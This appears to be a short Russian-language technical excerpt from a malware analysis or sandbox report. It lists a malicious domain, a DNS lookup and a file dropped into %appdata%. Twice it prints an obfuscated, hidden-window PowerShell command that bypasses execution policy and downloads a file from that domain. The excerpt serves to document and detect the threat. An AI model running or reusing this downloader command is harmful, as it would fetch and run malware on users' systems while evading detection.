Техническая информация
- http://trendsnonstop.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwe^RSHEL^L.^Exe^ -EXecUTI^ON^Po^l^IcY ^byPASs^ -no^P^Ro^Fi^LE^ -w^inD^owst^YL^e ^hiddEn (NE^w-o^BJe^Ct syst^e^M.n^et.^w^E^bcL^iEnT^)^.doW^nLo^ADFilE('http://trendsnonstop.to...
- DNS ASK tr####nonstop.top
- '<SYSTEM32>\cmd.exe' /c "pOwe^RSHEL^L.^Exe^ -EXecUTI^ON^Po^l^IcY ^byPASs^ -no^P^Ro^Fi^LE^ -w^inD^owst^YL^e ^hiddEn (NE^w-o^BJe^Ct syst^e^M.n^et.^w^E^bcL^iEnT^)^.doW^nLo^ADFilE('http://trendsnonstop.to...' (со скрытым окном)